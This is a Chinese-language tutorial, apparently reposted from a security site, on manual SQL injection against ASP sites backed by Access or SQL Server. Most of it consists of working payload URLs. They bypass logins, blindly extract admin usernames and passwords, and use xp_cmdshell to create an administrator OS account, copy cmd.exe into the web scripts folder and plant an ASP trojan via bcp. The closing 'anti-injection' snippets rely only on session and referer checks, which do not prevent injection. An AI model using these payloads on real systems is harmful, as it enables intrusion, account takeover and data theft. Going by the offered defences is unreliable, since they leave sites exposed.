SQL注入思路与手工猜解大进阶

什么叫SQL注入？

许多网站程序在编写时，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。用户能够提交一段数据库查询代码，（通常是在浏览器地址栏进行,经过正常的www端口访问）根据程序返回的结果，得到某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。

SQL注入的思路

思路最重要。其实好多人都不知道SQL到底能作什么呢？这里总结一下SQL注入入侵的整体的思路：

1. SQL注入漏洞的判断，即寻找注入点

2. 判断后台数据库类型

3. 肯定XP_CMDSHELL可执行状况；若当前链接数据的账号具备SA权限(这是SQL系统中的最高权限)，且master.dbo.xp_cmdshell扩展存储过程(调用此存储过程能够直接使用操做系统的shell)可以正确执行，则整个计算机能够经过几种方法彻底控制，也就完成了整个注入过程，不然继续：

1. 发现WEB虚拟目录

2. 上传ASP木马；

3. 获得管理员权限

具体步骤：

1、SQL注入漏洞的判断

若是之前没玩过注入，请把IE菜单-工具-Internet选项－高级－显示友好HTTP错误信息前面的勾去掉。

为了把问题说明清楚，如下以HTTP://www.2cto.com/news.asp?id=xx(这个地址是假想的)，为例进行分析，xx多是整型，也有多是字符串。

一、整型参数的判断

当输入的参数xx为整型时，一般news.asp中SQL语句原貌大体以下：

select * from 表名 where 字段=xx，因此能够用如下步骤测试SQL注入是否存在。

最简单的判断方法

HTTP://www.2cto.com/news.asp?id=xx’(附加一个单引号)，

此时news.asp中的SQL语句变成了

select * from 表名 where 字段=xx’，

若是程序没有过滤好“’”的话，就会提示 news.asp运行异常；但这样的方法虽然很简单，但并非最好的，由于：

first,不必定每台服务器的IIS都返回具体错误提示给客户端，若是程序中加了cint(参数)之类语句的话，SQL注入是不会成功的，但服务器一样会报错，具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。

second，目前大多数程序员已经将“’“ 过滤掉，因此用” ’”测试不到注入点，因此通常使用经典的1=1和1=2测试方法，见下文：

HTTP://www.2cto.com/news.asp?id=xx and 1=1, news.asp运行正常，

并且与HTTP://www.2cto.com/news.asp?id=xx运行结果相同；

HTTP://www.2cto.com/news.asp?id=xx and 1=2, news.asp运行异常；（这就是经典的 1=1 1=2 判断方法）

若是以上面知足，news.asp中就会存在SQL注入漏洞，反之则可能不能注入。

二、字符串型参数的判断

方法与数值型参数判断方法基本相同

当输入的参数xx为字符串时，一般news.asp中SQL语句原貌大体以下：

select * from 表名 where 字段=’xx’，因此能够用如下步骤测试SQL注入是否存在。

HTTP://www.2cto.com/news.asp?id=xx’(附加一个单引号)，此时news.asp中的SQL语句变成了
select * from 表名 where 字段=xx’，news.asp运行异常；
HTTP://www.2cto.com/news.asp?id=xx and '1’=’1′, news.asp运行正常，

并且与HTTP://www.2cto.com/news.asp?id=xx运行结果相同；

HTTP://www.2cto.com/news.asp?id=xx and '1’=’2′, news.asp运行异常；

若是以上知足，则news.asp存在SQL注入漏洞，反之则不能注入

三、特殊状况的处理

有时ASP程序员会在程序员过滤掉单引号等字符，以防止SQL注入。此时能够用如下几种方法试一试。

①大小定混合法：因为VBS并不区分大小写，而程序员在过滤时一般要么所有过滤大写字符串，要么所有过滤小写字符串，而大小写混合每每会被忽视。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字符集实现国际化，咱们彻底能够IE中输入的字符串化成UNICODE字符串进行输入。如+ =%2B，空格=%20 等；

③ASCII码法：能够把输入的部分或所有字符所有

四、除了上述方法之外，还有个更简单的方法就是使用现成的工具好比NBSI，啊D注入工具就是一款很不错的工具，目前最新的版本为2.2

2、判断数据库类型

不一样的数据库的函数、注入方法都是有差别的，因此在注入以前，咱们还要判断一下数据库的类型。通常ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站都是其中之一。

怎么让程序告诉你它使用的什么数据库呢？来看看：

SQLServer有一些系统变量，若是服务器IIS提示没关闭，而且SQLServer返回错误提示的话，那能够直接从出错信息获取，方法以下：
HTTP://www.2cto.com/news.asp?id=xx;and user＞0

这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我本身也是在一次无心的测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常的，重点在and user＞0，咱们知道，user是SQLServer的一个内置变量，它的值是当前链接的用户名，类型为nvarchar。拿一个 nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，固然，转的过程当中确定会出错，SQLServer的出错提示是：将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。在之后的篇幅里，你们会看到不少用这种方法的语句。 顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa权限，几乎确定能够拿到主机的 Administrator了。上面的方法能够很方便的测试出是不是用sa登陆，要注意的是：若是是sa登陆，提示是将”dbo”转换成int的列发生错误，而不是“sa”。

若是服务器IIS不容许返回错误提示，那怎么判断数据库类型呢？咱们能够从Access和SQLServer和区别入手，Access和 SQLServer都有本身的系统表，好比存放数据库中全部对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。

在确承认以注入的状况下，使用下面的语句：

HTTP://www.2cto.com/news.asp?id=xx ;and (select count(*) from sysobjects)＞0
HTTP://www.2cto.com/news.asp?id=xx ;and (select count(*) from msysobjects)＞0

若是数据库是SQLServer，那么第一个网址的页面与原页面HTTP://www.2cto.com/news.asp?id=xx是大体相同的；而第二个网址，因为找不到表msysobjects，会提示出错，就算程序有容错处理，页面也与原页面彻底不一样。

若是数据库用的是Access，那么状况就有所不一样，第一个网址的页面与原页面彻底不一样；第二个网址，则视乎数据库设置是否容许读该系统表，通常来讲是不容许的，因此与原网址也是彻底不一样。大多数状况下，用第一个网址就能够得知系统所用的数据库类型，第二个网址只做为开启IIS错误提示时的验证。

3、肯定XP_CMDSHELL可执行状况

若当前链接数据的账号具备SA权限，且master.dbo.xp_cmdshell扩展存储过程(调用此存储过程能够直接使用操做系统的shell)可以正确执行，则整个计算机能够经过如下几种方法彻底控制，之后的全部步骤均可以省

一、HTTP://www.2cto.com/news.asp?id=xx and user＞;0 news.asp执行异常但能够获得当前链接数据库的用户名(若显示dbo则表明SA)。

二、HTTP://www.2cto.com/news.asp?id=xx and db_name()＞0 news.asp执行异常但能够获得当前链接的数据库名。

三、HTTP://www.2cto.com/news.asp?id=xx；exec master..xp_cmdshell “net user aaa bbb /add”– (master是SQL-SERVER的主数据
库；名中的分号表示SQL-SERVER执行完分号前的语句名，继续执行其后面的语句；“—”号是注解，表示其后面的全部内容仅为注释，系统并不执行)能够直接增长操做系统账户aaa,密码为bbb。

四、HTTP://www.2cto.com/news.asp?id=xx；exec master..xp_cmdshell “net localgroup administrators aaa /add”– 把刚刚增长
的账户aaa加到administrators组中。

五、HTTP://www.2cto.com/news.asp?id=xx；backuup database 数据库名 to disk=’c:\inetpub\wwwroot\save.db’ 则把获得的数据内容
所有备份到WEB目录下，再用HTTP把此文件下载(固然首选要知道WEB虚拟目录)。

六、经过复制CMD建立UNICODE漏洞

HTTP://www.2cto.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe” 便制造了一个UNICODE漏洞，经过此漏洞的利用方法，便完成了对整个计算机的控制(固然首选要知道WEB虚拟目录)。

这样你就成功的完成了一次SQL注入攻击了！这个时候

当上述条件不成立时就要继续下面的步骤
(一)、发现WEB虚拟目录

只有找到WEB虚拟目录，才能肯定放置ASP木马的位置，进而获得USER权限。有两种方法比较有效。

一是根据经验猜解，通常来讲，WEB虚拟目录是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可执行虚拟目录是：
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍历系统的目录结构，分析结果并发现WEB虚拟目录；

先建立一个临时表：temp

HTTP://www.2cto.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));–

接下来：

1 咱们能够利用xp_availablemedia来得到当前全部驱动器,并存入temp表中：

HTTP://www.2cto.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;–

咱们能够经过查询temp的内容来得到驱动器列表及相关信息

2 咱们能够利用xp_subdirs得到子目录列表,并存入temp表中：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\';–

3 咱们还能够利用xp_dirtree得到全部子目录的目录树结构,并寸入temp表中：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\';–

这样就能够成功的浏览到全部的目录（文件夹）列表：

若是咱们须要查看某个文件的内容，能够经过执行xp_cmdsell：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp';–

使用’bulk insert’语法能够将一个文本文件插入到一个临时表中。如：bulk insert temp(id) from ‘c:\inetpub\wwwroot\index.asp’
浏览temp就能够看到index.asp文件的内容了！经过分析各类ASP文件，能够获得大量系统信息，WEB建设与管理信息，甚至能够获得SA账号的链接密码。

固然，若是xp_cmshell可以执行，咱们能够用它来完成：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘dir c:\';–
HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘dir c:\ *.asp /s/a';–

经过xp_cmdshell咱们能够看到全部想看到的，包括W3svc

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc’

可是，若是不是SA权限，咱们还可使用

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\';–

注意：

一、以上每完成一项浏览后，应删除TEMP中的全部内容，删除方法是：

HTTP://www.2cto.com/news.asp?id=xx;delete from temp;–

二、浏览TEMP表的方法是：(假设TestDB是当前链接的数据库名)
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )＞0

获得表TEMP中第一条记录id字段的值，并与整数进行比较，显然news.asp工做异常，但在异常中却能够发现id字段的值。假设发现的表名是xyz，则

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )＞0 where id not in(‘xyz’))＞0

获得表TEMP中第二条记录id字段的值。

(二)、上传ASP木马

所谓ASP木马，就是一段有特殊功能的ASP代码，并放入WEB虚拟目录的Scripts下，远程客户经过IE就可执行它，进而获得系统的USER权限，实现对系统的初步控制。上传ASP木马通常有两种比较有效的方法：

一、利用WEB的远程管理功能

许多WEB站点，为了维护的方便，都提供了远程管理的功能；也有很多WEB站点，其内容是对于不一样的用户有不一样的访问权限。为了达到对用户权限的控制，都有一个网页，要求用户名与密码，只有输入了正确的值，才能进行下一步的操做,能够实现对WEB的管理，如上传、下载文件，目录浏览、修改配置等。

所以，若获取正确的用户名与密码，不只能够上传ASP木马，有时甚至可以直接获得USER权限而浏览系统，上一步的“发现WEB虚拟目录”的复杂操做均可省略。

用户名及密码通常存放在一张表中，发现这张表并读取其中内容便解决了问题。如下给出两种有效方法。

A、 注入法：

从理论上说，认证网页中会有型如：

select * from admin where username=’XXX’ and password=’YYY’ 的语句，若在正式运行此句以前，没有进行必要的字符过滤，则很容易实施SQL注入。

如在用户名文本框内输入：abc’ or 1=1– 在密码框内输入：123 则SQL语句变成：

select * from admin where username=’abc’ or 1=1 and password=’123’

无论用户输入任何用户名与密码，此语句永远都能正确执行，用户轻易骗过系统，获取合法身份。

B、猜解法：

基本思路是：猜解全部数据库名称，猜出库中的每张表名，分析多是存放用户名与密码的表名，猜出表中的每一个字段名，猜出表中的每条记录内容。

a 猜解全部数据库名称

HTTP://www.2cto.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name＞1 and dbid=6) ＜＞0

由于dbid的值从1到5，是系统用了。因此用户本身建的必定是从6开始的。而且咱们提交了 name＞1 (name字段是一个字符型的字段和数字比较会出错),news.asp工做异常，可获得第一个数据库名，同理把DBID分别改为7,8，9,10,11,12…就可获得全部数据库名。

如下假设获得的数据库名是TestDB。

b 猜解数据库中用户名表的名称

猜解法：此方法就是根据我的的经验猜表名，通常来讲，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并经过语句进行判断

HTTP://www.2cto.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)＞0 若表名存在，则news.asp工做正常，不然异常。如此循环，直到猜到系统账号表的名称。

读取法：SQL-SERVER有一个存放系统核心信息的表sysobjects，有关一个库的全部表，视图等信息所有存放在此表中，并且此表能够经过WEB进行访问。

当xtype=’U’ and status＞0表明是用户创建的表，发现并分析每个用户创建的表及名称，即可以获得用户名表的名称，基本的实现方法是：

①HTTP://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype=’U’ and status＞0 )＞0
获得第一个用户创建表的名称，并与整数进行比较，显然news.asp工做异常，但在异常中却能够发现表的名称。假设发现的表名是xyz，则

②HTTP://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype=’U’ and status＞0 and
name not in(‘xyz’))＞0 能够获得第二个用户创建的表的名称，同理就可获得全部用创建的表的名称。

根据表的名称，通常能够认定那张表用户存放用户名及密码，如下假设此表名为Admin。
c 猜解用户名字段及密码字段名称

admin表中必定有一个用户名字段，也必定有一个密码字段，只有获得此两个字段的名称，才有可能获得此两字段的内容。如何获得它们的名称呢，一样有如下两种方法。

猜解法：此方法就是根据我的的经验猜字段名，通常来讲，用户名字段的名称经常使用：username,name,user,account等。而密码字段的名称经常使用：password,pass,pwd,passwd等。并经过语句进行判断

HTTP://www.2cto.com/news.asp?id=xx and (select count(字段名) from TestDB.dbo.admin)＞0 “select count(字段名) from 表名”

语句获得表的行数，因此若字段名存在，则news.asp工做正常，不然异常。如此循环，直到猜到两个字段的名称。

读取法：基本的实现方法是

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 col_name(object_id(‘admin’),1) from TestDB.dbo.sysobjects)＞0 。
select top 1 col_name(object_id(‘admin’),1) from TestDB.dbo.sysobjects是从sysobjects获得已知表名的第一个字段名，当与整数进行比较，显然news.asp工做异常，但在异常中却能够发现字段的名称。把col_name(object_id(‘admin’),1)中的1依次换成2,3,4,5，6…就可获得全部的字段名称。

d 猜解用户名与密码

猜用户名与密码的内容最经常使用也是最有效的方法有：

ASCII码逐字解码法:虽然这种方法速度较慢，但确定是可行的。基本的思路是先猜出字段的长度，而后依次猜出每一位的值。猜用户名与猜密码的方法相同，如下以猜用户名为例说明其过程。

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

为用户名字段的名称，admin为表的名称)，若x为某一值i且news.asp运行正常时，则i就是第一个用户名的长度。如：当输入
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8时news.asp运行正常，则第一个用户名的长度为8

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步获得的用户名长度之间，当m=1，2,3，…时猜想分别猜想第1,2,3,…位的值；n的值是1~九、a~z、A~Z的ASCII值，也就是1~128之间的任意值；admin为系统用户账号表的名称)，若n为某一值i且news.asp运行正常时，则i对应ASCII码就是用户名某一位值。如：当输入
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80时news.asp运行正常，则用户名的第三位为P(P的ASCII为80)；HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33时news.asp运行正常，则用户名的第9位为!(!的ASCII为80)；猜到第一个用户名及密码后，同理，能够猜出其余全部用户名与密码。注意：有时获得的密码多是经MD5等方式加密后的信息，还须要用专用工具进行脱密。或者先改其密码，使用完后再改回来，见下面说明。简单法：猜用户名用HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username＞1) , flag是admin表中的一个字段，username是用户名字段，此时news.asp工做异常，但能获得Username的值。与上一样的方法，能够获得第二用户名，第三个用户等等，直到表中的全部用户名。

猜用户密码：HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd＞1) , flag是admin表中的一个字段，pwd是密码字段，此时news.asp工做异常，但能获得pwd的值。与上一样的方法，能够获得第二用户名的密码，第三个用户的密码等等，直到表中的全部用户的密码。密码有时是经MD5加密的，能够改密码。

HTTP://www.2cto.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=’ a0b923820dcc509a’ where username=’www';– ( 1的MD5值为：AAABBBCCCDDDEEEF，即把密码改为1；www为已知的用户名)用一样的方法固然可把密码改原来的值。

二、利用表内容导成文件功能

SQL有BCP命令，它能够把表的内容导成文本文件并放到指定位置。利用这项功能，咱们能够先建一张临时表，而后在表中一行一行地输入一个ASP木马，而后用BCP命令导出造成ASP文件。

命令行格式以下：

bcp “select * from text..foo” queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar
(‘S’参数为执行查询的服务器，’U’参数为用户名，’P’参数为密码，最终上传了一个163.asp的木马)

三、利用工具，如NBSI给出的一些参考数据最重要的表名：

select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

最重要的一些用户名（默认sql数据库中存在着的）

public
dbo
guest(通常禁止，或者没权限)
db_sercurityadmin
ab_dlladmin
一些默认扩展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驱动器相关
xp_dirtree 目录
xp_enumdsn ODBC链接
xp_loginconfig 服务器安全模式信息
xp_makecab 建立压缩卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 终端进程，给出一个PID
(三)、获得系统的管理员权限

ASP木马只有USER权限，要想获取对系统的彻底控制，还要有系统的管理员权限。怎么办？提高权限的方法有不少种：

上传木马，修改开机自动运行的.ini文件(它一重启，便死定了)；

复制CMD.exe到scripts，人为制造UNICODE漏洞；

下载SAM文件，破解并获取OS的全部用户名密码；

等等，视系统的具体状况而定，能够采起不一样的方法。

那么咱们怎么防注入呢？程序以下加入到asp或html或php或cgi里面均可以。通过测试。加入如 top.asp文件中开头

 

方法一(只要有用户注入则跳转到../../目录)：

＜%if session(“username”=”” or session(“userkey”=”” then
response.redirect “../../”
end if%＞

 

方法二(只要有用户注入则判断为外部链接)：

＜%
server_v1=Cstr(Request.ServerVariables(“HTTP_REFERER”)
server_v2=Cstr(Request.ServerVariables(“SERVER_NAME”)
if mid(server_v1,8,len(server_v2))＜＞server_v2 then
response.write “＜br＞＜br＞＜center＞＜table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450＞”
response.write “＜tr＞＜td style=“font:9pt Verdana“＞”
response.write “你提交的路径有误，禁止从站点外部提交数据请不要乱该参数！”
response.write “＜/td＞＜/tr＞＜/table＞＜/center＞”
response.end
end if
%＞

 

方法三(只要有用户注入则跳转到../目录)：

＜% dim From_url,Serv_urlFrom_url = Cstr(Request.ServerVariables(“HTTP_REFERER”)Serv_url = Cstr(Request.ServerVariables(“SERVER_NAME”)if mid(From_url,8,len(Serv_url)) ＜＞ Serv_url thenresponse.write “NO”response.redirect(“../”response.endend if%＞